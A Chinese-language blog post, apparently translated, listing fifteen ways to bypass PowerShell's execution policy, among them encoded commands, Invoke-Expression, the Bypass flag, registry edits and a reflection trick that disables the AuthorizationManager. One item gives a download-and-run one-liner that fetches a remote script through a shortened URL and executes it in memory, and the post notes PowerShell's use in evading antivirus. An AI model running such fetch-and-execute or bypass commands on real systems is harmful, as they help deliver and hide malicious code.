哪些方法可以繞過(guò)PowerShell Execution Policy?

默認(rèn)情況下,PowerShell禁止PowerShell腳本在Windows系統(tǒng)中執(zhí)行。這會(huì)妨礙滲透測(cè)試員,系統(tǒng)管理員,和開(kāi)發(fā)人員……在這里我將在沒(méi)有系統(tǒng)管理員權(quán)限的情況下通過(guò)15個(gè)方法來(lái)繞過(guò)PowerShell execution policy。
我肯定還有很多的技術(shù)漏了(或者我根本不知道),但希望這篇文章將給需要它的人提供一個(gè)良好的開(kāi)端。

** 什么是PowerShell Execution Policy?**
PowerShell execution policy 是用來(lái)決定哪些類型的PowerShell腳本可以在系統(tǒng)中運(yùn)行。默認(rèn)情況下,它是“Restricted”(限制)的。然而,這個(gè)設(shè)置從來(lái)沒(méi)有算是一種安全控制。相反,它會(huì)阻礙管理員操作。這就是為什么我們有這么多繞過(guò)它的方法。包括一些微軟提供的。更多關(guān)于在PowerShell執(zhí)行政策設(shè)置,默認(rèn)的安全控制的設(shè)置。我建議閱讀Carlos Perez的博客。他提供了一個(gè)很好的概述。

** 為什么要繞過(guò)執(zhí)行政策**
我聽(tīng)到的最多的原因是因?yàn)槿藗兿M麑?shí)現(xiàn)自動(dòng)化操作,但下面還有一些其他原因致使PowerShell在管理員、滲透測(cè)試員、黑客們手中如此流行:

支持Windows
能調(diào)用Windows API
能在不寫入磁盤的情況下運(yùn)行命令
能避免病毒的檢測(cè)
總是被標(biāo)記為"信任"。是大部分應(yīng)用程序的白名單一員。
曾寫出過(guò)許多的開(kāi)源滲透測(cè)試工具包

如何查看Execution Policy
在能夠使用所有完美功能的PowerShell之前,攻擊者可以繞過(guò)“Restricted”(限制)execution policy。你可以通過(guò)PowerShell命令“executionpolicy“看看當(dāng)前的配置。如果你第一次看它的設(shè)置可能設(shè)置為“Restricted”(限制),如下圖所示

PS C:> Get-ExecutionPolicy
Powershell_Bypass_1.png

同樣值得注意的是execution policy可以在系統(tǒng)中設(shè)置不同的級(jí)別。要查看他們使用下面的命令列表。更多信息可以點(diǎn)擊這里查看微軟的“Set-ExecutionPolicy” 。

Get-ExecutionPolicy -List | Format-Table -AutoSize


實(shí)驗(yàn)環(huán)境說(shuō)明
在下面的例子中我將使用一個(gè)名為runme.ps1的腳本,它將包含以下PowerShell命令來(lái)寫出一個(gè)消息到控制臺(tái):

Write-Host "My voice is my passport, verify me."

當(dāng)我試圖在一個(gè)帶有默認(rèn)execution policy的系統(tǒng)上執(zhí)行它時(shí),我得到以下錯(cuò)誤:


如果你目前的execution policy是開(kāi)放的,你想讓它更嚴(yán)格的測(cè)試,下面的技巧,然后從管理員PowerShell控制臺(tái)運(yùn)行命令“Set-ExecutionPolicy Restricted”。OK,那我接著B(niǎo)B了,接下來(lái)我會(huì)通過(guò)15種方法來(lái)繞過(guò)PowerShell execution policy的限制。

繞過(guò)PowerShell Execution Policy
1. 把腳本直接粘貼到交互式的PowerShell控制臺(tái)
復(fù)制并粘貼你的PowerShell腳本為一個(gè)交互式控制臺(tái)如下圖所示。但是,請(qǐng)記住,你將被當(dāng)前用戶權(quán)限限制。這是最基本的例子,當(dāng)你有一個(gè)交互控制臺(tái)時(shí),可以方便快速地運(yùn)行腳本。此外,這種技術(shù)不會(huì)更改配置或需要寫入磁盤。


2. Echo腳本并PowerShell的標(biāo)準(zhǔn)輸入
簡(jiǎn)單的ECHO腳本到PowerShell的標(biāo)準(zhǔn)輸入。這種技術(shù)不會(huì)導(dǎo)致配置的更改或要求寫入磁盤。

Echo Write-Host "My voice is my passport, verify me."  | PowerShell.exe -noprofile -


3. 從文件中讀取腳本并通過(guò)PowerShell的標(biāo)準(zhǔn)輸入
使用Windows的"type"命令或PowerShell的"Get-Content"命令來(lái)從磁盤讀取你的腳本并輸入到標(biāo)準(zhǔn)的PowerShell中,這種技術(shù)不會(huì)導(dǎo)致配置文件的更改,但是需要寫入磁盤。然而,如果你想試圖避免寫到磁盤,你可以從網(wǎng)絡(luò)上讀取你的腳本。
例1:Get-Content Powershell命令

Get-Content .runme.ps1 | PowerShell.exe -noprofile -


例2:Type 命令

TYPE .runme.ps1 | PowerShell.exe -noprofile -


4. 從網(wǎng)絡(luò)上下載腳本并通過(guò)IEX執(zhí)行它
這種技術(shù)可以用來(lái)從網(wǎng)上下載一個(gè)PowerShell腳本并執(zhí)行它無(wú)需寫入磁盤。它也不會(huì)導(dǎo)致任何配置更改。我已經(jīng)看到它有許多創(chuàng)造性的使用方法,但最近看到它被引用到一個(gè)不錯(cuò)的Matt Graeber的PowerSploit博客上。

powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"


5. 使用Command
這種技術(shù)和通過(guò)復(fù)制和粘貼來(lái)執(zhí)行一個(gè)腳本是非常相似的,但它可以做沒(méi)有交互式控制臺(tái)。這是很好的方式適合執(zhí)行簡(jiǎn)單的腳本,但更復(fù)雜的腳本通常容易出現(xiàn)錯(cuò)誤。這種技術(shù)不會(huì)導(dǎo)致配置更改或要求寫入磁盤。
例1:完整的命令

Powershell -command "Write-Host 'My voice is my passport, verify me.'"


例2:簡(jiǎn)短的命令

Powershell -c "Write-Host 'My voice is my passport, verify me.'"

6. 使用EncodeCommand
這和使用"Command"命令非常像,但它為所有的腳本提供了一個(gè)Unicode / Base64編碼串。通過(guò)這種方式加密你的腳本可以幫你繞過(guò)所有通過(guò)"Command"執(zhí)行時(shí)會(huì)遇到的錯(cuò)誤。這種技術(shù)不會(huì)導(dǎo)致配置文件的更改或要求寫入磁盤。下面的示例來(lái)自 Posh-SecMod。
例1: 完整的命令

$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand


例2: 通過(guò)簡(jiǎn)短的命令使用編碼串

powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA

7. 使用Invoke-Command命令
我在obscuresec的博客看到了這種有趣的方法。這是一個(gè)典型的通過(guò)交互式PowerShell控制臺(tái)執(zhí)行的方法。但最酷的是當(dāng)PowerShell遠(yuǎn)程處理開(kāi)啟時(shí)我可以用它來(lái)對(duì)遠(yuǎn)程系統(tǒng)執(zhí)行命令。這種技術(shù)不會(huì)導(dǎo)致配置更改或要求寫入磁盤。

invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}


基于obscuresec博客,下面的命令還可以用來(lái)抓取從遠(yuǎn)程計(jì)算機(jī)的execution policy并將其應(yīng)用到本地計(jì)算機(jī)。

invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force

8. 使用Invoke-Expression命令
這是另一個(gè)典型的通過(guò)交互式PowerShell控制臺(tái)執(zhí)行的方法。這種技術(shù)不會(huì)導(dǎo)致配置更改或要求寫入磁盤。下面我列舉了一些常用的方法來(lái)通過(guò)Invoke-Expression繞過(guò)execution policy。
例1:使用Get-Content的完整命令

Get-Content .runme.ps1 | Invoke-Expression


例2:使用Get-Content的簡(jiǎn)短的命令

GC .runme.ps1 | iex

9.使用"Bypass"標(biāo)記Execution Policy
當(dāng)你通過(guò)腳本文件執(zhí)行命令的時(shí)候這是一個(gè)很好的繞過(guò)execution policy的方法。當(dāng)你使用這個(gè)標(biāo)記的時(shí)候"沒(méi)有任何東西被阻止,沒(méi)有任何警告或提示"。這種技術(shù)不會(huì)導(dǎo)致配置更改或要求寫入磁盤。

PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1


10. 使用"Unrestricted"標(biāo)記Execution Policy
這類似于"Bypass"標(biāo)記。當(dāng)你使用這個(gè)標(biāo)記的時(shí)候,它會(huì)"加載所有的配置文件并運(yùn)行所有的腳本。如果你運(yùn)行從網(wǎng)上下載的一個(gè)未被簽名的腳本,它會(huì)提示你需要權(quán)限",這種技術(shù)不會(huì)導(dǎo)致配置的更改或要求寫入磁盤。

PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1


11. 使用 "Remote-Signed"標(biāo)記Execution Policy
創(chuàng)建你的腳本,然后按照教程的操作。最后,使用下面的命令運(yùn)行它:

PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1

12. 通過(guò)交換AuthorizationManager禁用ExecutionPolicy
這真是一個(gè)我碰到的來(lái)自http://www.nivot.org的創(chuàng)意。下面的函數(shù)可以通過(guò)一個(gè)交互式的PowerShell來(lái)執(zhí)行。一旦函數(shù)被調(diào)用"AuthorizationManager"就會(huì)被替換成空。最終結(jié)果是,接下來(lái)的會(huì)話基本上不受execution policy的限制。然而,它的變化將被應(yīng)用于會(huì)話的持續(xù)時(shí)間。

function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}  Disable-ExecutionPolicy  .runme.ps1


13. 把ExcutionPolicy設(shè)置成Process Scope
正如我們?cè)谝灾兴吹降?,?zhí)行策略可以應(yīng)用于多層次的。這包括你控制的過(guò)程。使用這種技術(shù),執(zhí)行策略可以被設(shè)置為您的會(huì)話的持續(xù)時(shí)間不受限制。此外,它不會(huì)導(dǎo)致在配置更改,或需要寫入到磁盤。我最初發(fā)現(xiàn)這種技術(shù)來(lái)自r007break博客。

Set-ExecutionPolicy Bypass -Scope Process


14. 通過(guò)命令設(shè)置ExcutionPolicy為CurrentUser Scope
這種方法和上面那種類似。但是這種方法通過(guò)修改注冊(cè)表將當(dāng)前用戶環(huán)境的設(shè)置應(yīng)用到當(dāng)前用戶的環(huán)境中。此外,它不會(huì)導(dǎo)致在配置更改,或需要寫入到磁盤。我最初發(fā)現(xiàn)這種技術(shù)來(lái)自r007break博客。

Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted


15. 通過(guò)注冊(cè)表設(shè)置ExcutionPolicy為CurrentUser Scope
在這個(gè)例子中,我展示了如何通過(guò)修改注冊(cè)表項(xiàng)來(lái)改變當(dāng)前用戶的環(huán)境的執(zhí)行策略。

HKEY_CURRENT_USER\Software\MicrosoftPowerShell\1\ShellIds\Microsoft.PowerShell

總結(jié)
我覺(jué)得這里的主題是:使用的execution policy不一定是開(kāi)發(fā)商,管理員,或者。微軟從來(lái)沒(méi)有打算將它成為一個(gè)安全控制。這就是為什么有這么多選擇繞過(guò)它。微軟很好地提供了一些本地選項(xiàng)和安全社區(qū)也拿出一些真正有趣的把戲。感謝所有通過(guò)博客和演講做出貢獻(xiàn)的人。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • Spring Cloud為開(kāi)發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見(jiàn)模式的工具(例如配置管理,服務(wù)發(fā)現(xiàn),斷路器,智...
    卡卡羅2017閱讀 136,539評(píng)論 19 139
  • Spring Boot 參考指南 介紹 轉(zhuǎn)載自:https://www.gitbook.com/book/qbgb...
    毛宇鵬閱讀 47,263評(píng)論 6 342
  • Ubuntu的發(fā)音 Ubuntu,源于非洲祖魯人和科薩人的語(yǔ)言,發(fā)作 oo-boon-too 的音。了解發(fā)音是有意...
    螢火蟲(chóng)de夢(mèng)閱讀 100,613評(píng)論 9 468
  • linux資料總章2.1 1.0寫的不好抱歉 但是2.0已經(jīng)改了很多 但是錯(cuò)誤還是無(wú)法避免 以后資料會(huì)慢慢更新 大...
    數(shù)據(jù)革命閱讀 13,209評(píng)論 2 33
  • 鏡由心生 · 閱讀 5 · 日記本 作者 【每日計(jì)劃(早宣晚結(jié))】 聚才LP3所向披靡!學(xué)...
    鏡由心生閱讀 209評(píng)論 0 0

友情鏈接更多精彩內(nèi)容